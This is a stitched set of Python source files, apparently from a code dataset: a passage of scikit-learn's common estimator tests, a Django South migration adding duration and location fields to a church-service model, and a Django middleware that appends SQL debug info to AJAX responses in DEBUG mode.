except Exception as exc:
print(error_string_fit, Estimator, exc)
traceback.print_exc(file=sys.stdout)
raise exc
else:
raise AssertionError(error_string_fit, Estimator)
# actually fit
if issubclass(Estimator, ClusterMixin):
# All estimators except clustering algorithm
# support fitting with (optional) y
estimator.fit(X_train_finite)
else:
estimator.fit(X_train_finite, y)
# predict
if hasattr(estimator, "predict"):
try:
estimator.predict(X_train)
except ValueError as e:
if not 'inf' in repr(e) and not 'NaN' in repr(e):
print(error_string_predict, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_predict, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_predict, Estimator)
# transform
if hasattr(estimator, "transform"):
try:
estimator.transform(X_train)
except ValueError as e:
if not 'inf' in repr(e) and not 'NaN' in repr(e):
print(error_string_transform, Estimator, e)
traceback.print_exc(file=sys.stdout)
raise e
except Exception as exc:
print(error_string_transform, Estimator, exc)
traceback.print_exc(file=sys.stdout)
else:
raise AssertionError(error_string_transform, Estimator)
def check_transformer_pickle(name, Transformer):
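"""Check that a fitted transformer produces the same transform output
after a pickle round-trip."""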
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
n_samples, n_features = X.shape
X = StandardScaler().fit_transform(X)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
if not hasattr(transformer, 'transform'):
return
set_random_state(transformer)
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
random_state = np.random.RandomState(seed=12345)
y_ = np.vstack([y, 2 * y + random_state.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit(X, y_).transform(X)
pickled_transformer = pickle.dumps(transformer)
unpickled_transformer = pickle.loads(pickled_transformer)
pickled_X_pred = unpickled_transformer.transform(X)
assert_array_almost_equal(pickled_X_pred, X_pred)
def check_estimators_partial_fit_n_features(name, Alg):
# check if number of features changes between calls to partial_fit.
if not hasattr(Alg, 'partial_fit'):
return
X, y = make_blobs(n_samples=50, random_state=1)
X -= X.min()
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if isinstance(alg, ClassifierMixin):
classes = np.unique(y)
alg.partial_fit(X, y, classes=classes)
else:
alg.partial_fit(X, y)
assert_raises(ValueError, alg.partial_fit, X[:, :-1], y)
def check_clustering(name, Alg):
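"""Fit the clustering algorithm on standardized blobs and check the shape
of labels_, an adjusted Rand score above 0.4, and, where the algorithm is
deterministic, that fit_predict agrees with labels_."""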
X, y = make_blobs(n_samples=50, random_state=1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
n_samples, n_features = X.shape
# catch deprecation and neighbors warnings
with warnings.catch_warnings(record=True):
alg = Alg()
set_fast_parameters(alg)
if hasattr(alg, "n_clusters"):
alg.set_params(n_clusters=3)
set_random_state(alg)
if name == 'AffinityPropagation':
alg.set_params(preference=-100)
alg.set_params(max_iter=100)
# fit
alg.fit(X)
# with lists
alg.fit(X.tolist())
assert_equal(alg.labels_.shape, (n_samples,))
pred = alg.labels_
assert_greater(adjusted_rand_score(pred, y), 0.4)
# fit another time with ``fit_predict`` and compare results
if name == 'SpectralClustering':
# there is no way to make Spectral clustering deterministic :(
return
set_random_state(alg)
with warnings.catch_warnings(record=True):
pred2 = alg.fit_predict(X)
assert_array_equal(pred, pred2)
def check_clusterer_compute_labels_predict(name, Clusterer):
"""Check that predict is invariant of compute_labels"""
X, y = make_blobs(n_samples=20, random_state=0)
clusterer = Clusterer()
if hasattr(clusterer, "compute_labels"):
# MiniBatchKMeans
if hasattr(clusterer, "random_state"):
clusterer.set_params(random_state=0)
X_pred1 = clusterer.fit(X).predict(X)
clusterer.set_params(compute_labels=False)
X_pred2 = clusterer.fit(X).predict(X)
assert_array_equal(X_pred1, X_pred2)
def check_classifiers_one_label(name, Classifier):
error_string_fit = "Classifier can't train when only one class is present."
error_string_predict = ("Classifier can't predict when only one class is "
"present.")
rnd = np.random.RandomState(0)
X_train = rnd.uniform(size=(10, 3))
X_test = rnd.uniform(size=(10, 3))
y = np.ones(10)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# try to fit
try:
classifier.fit(X_train, y)
except ValueError as e:
if not 'class' in repr(e):
print(error_string_fit, Classifier, e)
traceback.print_exc(file=sys.stdout)
raise e
else:
return
except Exception as exc:
print(error_string_fit, Classifier, exc)
traceback.print_exc(file=sys.stdout)
raise exc
# predict
try:
assert_array_equal(classifier.predict(X_test), y)
except Exception as exc:
print(error_string_predict, Classifier, exc)
raise exc
def check_classifiers_train(name, Classifier):
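"""Fit the classifier on binary and multiclass blobs and check input
validation, training accuracy, and that predict is consistent with
decision_function and predict_proba."""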
X_m, y_m = make_blobs(random_state=0)
X_m, y_m = shuffle(X_m, y_m, random_state=7)
X_m = StandardScaler().fit_transform(X_m)
# generate binary problem from multi-class one
y_b = y_m[y_m != 2]
X_b = X_m[y_m != 2]
for (X, y) in [(X_m, y_m), (X_b, y_b)]:
# catch deprecation warnings
classes = np.unique(y)
n_classes = len(classes)
n_samples, n_features = X.shape
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name in ['BernoulliNB', 'MultinomialNB']:
X -= X.min()
set_fast_parameters(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
# with lists
classifier.fit(X.tolist(), y.tolist())
assert_true(hasattr(classifier, "classes_"))
y_pred = classifier.predict(X)
assert_equal(y_pred.shape, (n_samples,))
# training set performance
if name not in ['BernoulliNB', 'MultinomialNB']:
assert_greater(accuracy_score(y, y_pred), 0.85)
# raises error on malformed input for predict
assert_raises(ValueError, classifier.predict, X.T)
if hasattr(classifier, "decision_function"):
try:
# decision_function agrees with predict
decision = classifier.decision_function(X)
if n_classes == 2:
assert_equal(decision.shape, (n_samples,))
dec_pred = (decision.ravel() > 0).astype(np.int)
assert_array_equal(dec_pred, y_pred)
if (n_classes == 3
and not isinstance(classifier, BaseLibSVM)):
# 1on1 of LibSVM works differently
assert_equal(decision.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(decision, axis=1), y_pred)
# raises error on malformed input
assert_raises(ValueError,
classifier.decision_function, X.T)
# raises error on malformed input for decision_function
assert_raises(ValueError,
classifier.decision_function, X.T)
except NotImplementedError:
pass
if hasattr(classifier, "predict_proba"):
# predict_proba agrees with predict
y_prob = classifier.predict_proba(X)
assert_equal(y_prob.shape, (n_samples, n_classes))
assert_array_equal(np.argmax(y_prob, axis=1), y_pred)
# check that probas for all classes sum to one
assert_array_almost_equal(np.sum(y_prob, axis=1),
np.ones(n_samples))
# raises error on malformed input
assert_raises(ValueError, classifier.predict_proba, X.T)
# raises error on malformed input for predict_proba
assert_raises(ValueError, classifier.predict_proba, X.T)
def check_estimators_unfitted(name, Estimator):
"""Check if NotFittedError is raised when calling predict and related
functions"""
# Common test for Regressors as well as Classifiers
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
est = Estimator()
if hasattr(est, 'predict'):
assert_raises(NotFittedError, est.predict, X)
if hasattr(est, 'decision_function'):
assert_raises(NotFittedError, est.decision_function, X)
if hasattr(est, 'predict_proba'):
assert_raises(NotFittedError, est.predict_proba, X)
if hasattr(est, 'predict_log_proba'):
assert_raises(NotFittedError, est.predict_log_proba, X)
def check_classifiers_input_shapes(name, Classifier):
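    # Fitting with a column-vector y must emit exactly one
    # DataConversionWarning and leave predictions unchanged.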
iris = load_iris()
X, y = iris.data, iris.target
X, y = shuffle(X, y, random_state=1)
X = StandardScaler().fit_transform(X)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
set_random_state(classifier)
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
set_random_state(classifier)
# Check that when a 2D y is given, a DataConversionWarning is
# raised
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always", DataConversionWarning)
classifier.fit(X, y[:, np.newaxis])
msg = "expected 1 DataConversionWarning, got: %s" % (
", ".join([str(w_x) for w_x in w]))
assert_equal(len(w), 1, msg)
assert_array_equal(y_pred, classifier.predict(X))
def check_classifiers_classes(name, Classifier):
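    # Fit with string class labels (and an object-dtype variant) and
    # check that predictions and classes_ use the same label set.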
X, y = make_blobs(n_samples=30, random_state=0, cluster_std=0.1)
X, y = shuffle(X, y, random_state=7)
X = StandardScaler().fit_transform(X)
    # We need to make sure that we have non-negative data, for things
    # like NMF
X -= X.min() - .1
y_names = np.array(["one", "two", "three"])[y]
for y_names in [y_names, y_names.astype('O')]:
if name in ["LabelPropagation", "LabelSpreading"]:
# TODO some complication with -1 label
y_ = y
else:
y_ = y_names
classes = np.unique(y_)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
if name == 'BernoulliNB':
classifier.set_params(binarize=X.mean())
set_fast_parameters(classifier)
# fit
classifier.fit(X, y_)
y_pred = classifier.predict(X)
# training set performance
assert_array_equal(np.unique(y_), np.unique(y_pred))
if np.any(classifier.classes_ != classes):
print("Unexpected classes_ attribute for %r: "
"expected %s, got %s" %
(classifier, classes, classifier.classes_))
def check_classifiers_pickle(name, Classifier):
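    # Classifier predictions must survive a pickle round-trip.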
X, y = make_blobs(random_state=0)
X, y = shuffle(X, y, random_state=7)
X -= X.min()
# catch deprecation warnings
with warnings.catch_warnings(record=True):
classifier = Classifier()
set_fast_parameters(classifier)
# raises error on malformed input for fit
assert_raises(ValueError, classifier.fit, X, y[:-1])
# fit
classifier.fit(X, y)
y_pred = classifier.predict(X)
pickled_classifier = pickle.dumps(classifier)
unpickled_classifier = pickle.loads(pickled_classifier)
pickled_y_pred = unpickled_classifier.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
def check_regressors_int(name, Regressor):
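    # Integer targets must yield (nearly) the same predictions as the
    # same targets cast to float.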
X, _ = _boston_subset()
X = X[:50]
rnd = np.random.RandomState(0)
y = rnd.randint(3, size=X.shape[0])
y = multioutput_estimator_convert_y_2d(name, y)
if name == 'OrthogonalMatchingPursuitCV':
# FIXME: This test is unstable on Travis, see issue #3190.
check_skip_travis()
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
regressor_1 = Regressor()
regressor_2 = Regressor()
set_fast_parameters(regressor_1)
set_fast_parameters(regressor_2)
set_random_state(regressor_1)
set_random_state(regressor_2)
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
# fit
regressor_1.fit(X, y_)
pred1 = regressor_1.predict(X)
        regressor_2.fit(X, y_.astype(float))
pred2 = regressor_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_regressors_train(name, Regressor):
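    # Fit on a standardized regression subset, check input validation,
    # and require a minimal training-set score from most regressors.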
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
if name == 'OrthogonalMatchingPursuitCV':
# FIXME: This test is unstable on Travis, see issue #3190.
check_skip_travis()
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
# raises error on malformed input for fit
assert_raises(ValueError, regressor.fit, X, y[:-1])
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
set_random_state(regressor)
regressor.fit(X, y_)
regressor.fit(X.tolist(), y_.tolist())
regressor.predict(X)
# TODO: find out why PLS and CCA fail. RANSAC is random
# and furthermore assumes the presence of outliers, hence
# skipped
if name not in ('PLSCanonical', 'CCA', 'RANSACRegressor'):
assert_greater(regressor.score(X, y_), 0.5)
def check_regressors_pickle(name, Regressor):
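    # Regressor predictions must survive a pickle round-trip.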
X, y = _boston_subset()
y = StandardScaler().fit_transform(y) # X is already scaled
y = multioutput_estimator_convert_y_2d(name, y)
if name == 'OrthogonalMatchingPursuitCV':
# FIXME: This test is unstable on Travis, see issue #3190.
check_skip_travis()
rnd = np.random.RandomState(0)
# catch deprecation warnings
with warnings.catch_warnings(record=True):
regressor = Regressor()
set_fast_parameters(regressor)
if not hasattr(regressor, 'alphas') and hasattr(regressor, 'alpha'):
# linear regressors need to set alpha, but not generalized CV ones
regressor.alpha = 0.01
if name in CROSS_DECOMPOSITION:
y_ = np.vstack([y, 2 * y + rnd.randint(2, size=len(y))])
y_ = y_.T
else:
y_ = y
regressor.fit(X, y_)
y_pred = regressor.predict(X)
# store old predictions
pickled_regressor = pickle.dumps(regressor)
unpickled_regressor = pickle.loads(pickled_regressor)
pickled_y_pred = unpickled_regressor.predict(X)
assert_array_almost_equal(pickled_y_pred, y_pred)
def check_class_weight_classifiers(name, Classifier):
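    # With an extreme class_weight favoring class 0, the classifier
    # should predict class 0 almost everywhere.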
for n_centers in [2, 3]:
# create a very noisy dataset
X, y = make_blobs(centers=n_centers, random_state=0, cluster_std=20)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.5,
random_state=0)
n_centers = len(np.unique(y_train))
if n_centers == 2:
class_weight = {0: 1000, 1: 0.0001}
else:
class_weight = {0: 1000, 1: 0.0001, 2: 0.0001}
with warnings.catch_warnings(record=True):
classifier = Classifier(class_weight=class_weight)
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
assert_greater(np.mean(y_pred == 0), 0.9)
def check_class_weight_auto_classifiers(name, Classifier, X_train, y_train,
X_test, y_test, weights):
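    # Refitting with class_weight='auto' should improve the weighted
    # F1 score over the default fit.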
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
classifier.set_params(n_iter=100)
set_random_state(classifier)
classifier.fit(X_train, y_train)
y_pred = classifier.predict(X_test)
classifier.set_params(class_weight='auto')
classifier.fit(X_train, y_train)
y_pred_auto = classifier.predict(X_test)
assert_greater(f1_score(y_test, y_pred_auto, average='weighted'),
f1_score(y_test, y_pred, average='weighted'))
def check_class_weight_auto_linear_classifier(name, Classifier):
"""Test class weights with non-contiguous class labels."""
X = np.array([[-1.0, -1.0], [-1.0, 0], [-.8, -1.0],
[1.0, 1.0], [1.0, 0.0]])
y = [1, 1, 1, -1, -1]
with warnings.catch_warnings(record=True):
classifier = Classifier()
if hasattr(classifier, "n_iter"):
            # This is a very small dataset; the default n_iter is likely
            # too small for convergence
classifier.set_params(n_iter=1000)
set_random_state(classifier)
# Let the model compute the class frequencies
classifier.set_params(class_weight='auto')
coef_auto = classifier.fit(X, y).coef_.copy()
# Count each label occurrence to reweight manually
mean_weight = (1. / 3 + 1. / 2) / 2
class_weight = {
1: 1. / 3 / mean_weight,
-1: 1. / 2 / mean_weight,
}
classifier.set_params(class_weight=class_weight)
coef_manual = classifier.fit(X, y).coef_.copy()
assert_array_almost_equal(coef_auto, coef_manual)
def check_estimators_overwrite_params(name, Estimator):
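    # get_params() must return identical values before and after fit;
    # estimators may not overwrite their own constructor parameters.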
X, y = make_blobs(random_state=0, n_samples=9)
y = multioutput_estimator_convert_y_2d(name, y)
# some want non-negative input
X -= X.min()
with warnings.catch_warnings(record=True):
# catch deprecation warnings
estimator = Estimator()
if name == 'MiniBatchDictLearning' or name == 'MiniBatchSparsePCA':
# FIXME
# for MiniBatchDictLearning and MiniBatchSparsePCA
estimator.batch_size = 1
set_fast_parameters(estimator)
set_random_state(estimator)
params = estimator.get_params()
estimator.fit(X, y)
new_params = estimator.get_params()
for k, v in params.items():
assert_false(np.any(new_params[k] != v),
"Estimator %s changes its parameter %s"
" from %s to %s during fit."
% (name, k, v, new_params[k]))
def check_cluster_overwrite_params(name, Clustering):
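    # Clustering counterpart of the check above: fit must not modify
    # constructor parameters.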
X, y = make_blobs(random_state=0, n_samples=9)
with warnings.catch_warnings(record=True):
# catch deprecation warnings
clustering = Clustering()
set_fast_parameters(clustering)
params = clustering.get_params()
clustering.fit(X)
new_params = clustering.get_params()
for k, v in params.items():
assert_false(np.any(new_params[k] != v),
"Estimator %s changes its parameter %s"
" from %s to %s during fit."
% (name, k, v, new_params[k]))
def check_sparsify_multiclass_classifier(name, Classifier):
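    # sparsify() must make coef_ sparse without changing predictions,
    # including after a pickle round-trip.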
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1],
[-1, -2], [2, 2], [-2, -2]])
y = [1, 1, 1, 2, 2, 2, 3, 3, 3]
est = Classifier()
est.fit(X, y)
pred_orig = est.predict(X)
# test sparsify with dense inputs
est.sparsify()
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
# pickle and unpickle with sparse coef_
est = pickle.loads(pickle.dumps(est))
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
def check_sparsify_binary_classifier(name, Estimator):
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
y = [1, 1, 1, 2, 2, 2]
est = Estimator()
est.fit(X, y)
pred_orig = est.predict(X)
# test sparsify with dense inputs
est.sparsify()
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
# pickle and unpickle with sparse coef_
est = pickle.loads(pickle.dumps(est))
assert_true(sparse.issparse(est.coef_))
pred = est.predict(X)
assert_array_equal(pred, pred_orig)
def check_classifier_data_not_an_array(name, Estimator):
X = np.array([[3, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 1]])
y = [1, 1, 1, 2, 2, 2]
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_regressor_data_not_an_array(name, Estimator):
X, y = _boston_subset(n_samples=50)
y = multioutput_estimator_convert_y_2d(name, y)
check_estimators_data_not_an_array(name, Estimator, X, y)
def check_estimators_data_not_an_array(name, Estimator, X, y):
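    # Fitting on array-like wrappers (NotAnArray) must give the same
    # predictions as fitting on the underlying ndarrays.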
if name in CROSS_DECOMPOSITION:
raise SkipTest
# catch deprecation warnings
with warnings.catch_warnings(record=True):
# separate estimators to control random seeds
estimator_1 = Estimator()
estimator_2 = Estimator()
set_fast_parameters(estimator_1)
set_fast_parameters(estimator_2)
set_random_state(estimator_1)
set_random_state(estimator_2)
y_ = NotAnArray(np.asarray(y))
X_ = NotAnArray(np.asarray(X))
# fit
estimator_1.fit(X_, y_)
pred1 = estimator_1.predict(X_)
estimator_2.fit(X, y)
pred2 = estimator_2.predict(X)
assert_array_almost_equal(pred1, pred2, 2, name)
def check_parameters_default_constructible(name, Estimator):
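    # Estimators must be default-constructible (meta-estimators get a
    # default classifier), clonable, and their __init__ must do nothing
    # but store the given parameters.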
classifier = LDA()
# test default-constructibility
# get rid of deprecation warnings
with warnings.catch_warnings(record=True):
if name in META_ESTIMATORS:
estimator = Estimator(classifier)
else:
estimator = Estimator()
# test cloning
clone(estimator)
# test __repr__
repr(estimator)
# test that set_params returns self
assert_true(isinstance(estimator.set_params(), Estimator))
# test if init does nothing but set parameters
# this is important for grid_search etc.
# We get the default parameters from init and then
# compare these against the actual values of the attributes.
# this comes from getattr. Gets rid of deprecation decorator.
init = getattr(estimator.__init__, 'deprecated_original',
estimator.__init__)
try:
args, varargs, kws, defaults = inspect.getargspec(init)
except TypeError:
# init is not a python function.
# true for mixins
return
params = estimator.get_params()
if name in META_ESTIMATORS:
# they need a non-default argument
args = args[2:]
else:
args = args[1:]
if args:
# non-empty list
assert_equal(len(args), len(defaults))
else:
return
for arg, default in zip(args, defaults):
if arg not in params.keys():
# deprecated parameter, not in get_params
assert_true(default is None)
continue
if isinstance(params[arg], np.ndarray):
assert_array_equal(params[arg], default)
else:
assert_equal(params[arg], default)
def multioutput_estimator_convert_y_2d(name, y):
    # Estimators in mono_output_task_error raise ValueError if y is 1-D.
    # Convert y into 2-D for those estimators.
if name in (['MultiTaskElasticNetCV', 'MultiTaskLassoCV',
'MultiTaskLasso', 'MultiTaskElasticNet']):
return y[:, np.newaxis]
return y
def check_non_transformer_estimators_n_iter(name, estimator,
multi_output=False):
    # Check that all iterative solvers run for more than one iteration.
iris = load_iris()
X, y_ = iris.data, iris.target
if multi_output:
y_ = y_[:, np.newaxis]
set_random_state(estimator, 0)
if name == 'AffinityPropagation':
estimator.fit(X)
else:
estimator.fit(X, y_)
assert_greater(estimator.n_iter_, 0)
def check_transformer_n_iter(name, estimator):
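    # After fitting, iterative transformers must report n_iter_ > 1
    # (one value per component for cross-decomposition estimators).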
if name in CROSS_DECOMPOSITION:
# Check using default data
X = [[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [2., 5., 4.]]
y_ = [[0.1, -0.2], [0.9, 1.1], [0.1, -0.5], [0.3, -0.2]]
else:
X, y_ = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X -= X.min() - 0.1
set_random_state(estimator, 0)
estimator.fit(X, y_)
# These return a n_iter per component.
if name in CROSS_DECOMPOSITION:
for iter_ in estimator.n_iter_:
assert_greater(iter_, 1)
else:
assert_greater(estimator.n_iter_, 1)
| bsd-3-clause | -6,095,188,954,073,235,000 | 34.606262 | 79 | 0.604999 | false |
jammon/gemeinde | gottesdienste/migrations/0004_auto__add_field_gottesdienst_dauer__add_field_gottesdienst_ort.py | 1 | 2642 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Gottesdienst.dauer'
db.add_column(u'gottesdienste_gottesdienst', 'dauer',
self.gf('django.db.models.fields.IntegerField')(default=60),
keep_default=False)
# Adding field 'Gottesdienst.ort'
db.add_column(u'gottesdienste_gottesdienst', 'ort',
self.gf('django.db.models.fields.CharField')(default='', max_length=50, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Gottesdienst.dauer'
db.delete_column(u'gottesdienste_gottesdienst', 'dauer')
# Deleting field 'Gottesdienst.ort'
db.delete_column(u'gottesdienste_gottesdienst', 'ort')
models = {
u'gottesdienste.gottesdienst': {
'Meta': {'object_name': 'Gottesdienst'},
'datum': ('django.db.models.fields.DateTimeField', [], {}),
'dauer': ('django.db.models.fields.IntegerField', [], {'default': '60'}),
'freitext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'ort': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'prediger_key': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['gottesdienste.Prediger']", 'null': 'True', 'blank': 'True'}),
'predigttext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'})
},
u'gottesdienste.prediger': {
'Meta': {'object_name': 'Prediger'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nachname': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'titel': ('django.db.models.fields.CharField', [], {'max_length': '10', 'blank': 'True'}),
'vorname': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
}
}
complete_apps = ['gottesdienste'] | mit | 1,991,793,960,841,552,400 | 48.867925 | 154 | 0.571537 | false |
katharine-kinn/django-sql-debugger | sql_debugger/middleware.py | 1 | 1318 | import json
from django.db import connections, connection
from django.conf import settings
__all__ = ['SQLDebugMiddleware']
class SQLDebugMiddleware(object):
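    """Attach SQL debug information to AJAX responses while DEBUG is on.

    Successful JSON responses get the executed queries appended under
    'sql_debug_info' along with the request path; error responses are
    repackaged as JSON carrying the error text and traceback.
    """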
def process_response(self, request, response):
if not settings.DEBUG:
return response
if request.is_ajax():
if response.status_code / 100 == 2:
try:
resp_d = json.loads(response.content)
resp_d['path'] = request.get_full_path()
resp_d['sql_debug_info'] = connection.queries
response.content = json.dumps(resp_d)
                except Exception:
                    # Response body was not valid JSON; leave it unchanged.
                    pass
else:
parts = {
"traceback": "Traceback"
}
empty_line = '\n\n'
resp_parts = response.content.split(empty_line)
res = { "error": resp_parts[0] }
for rp in resp_parts:
for k,p in parts.iteritems():
if rp.startswith(p):
res[k] = rp
response.content = json.dumps(
{
"errordata": res, "path": request.get_full_path()
}
)
return response
| mit | 3,783,446,745,468,610,600 | 28.954545 | 73 | 0.455994 | false |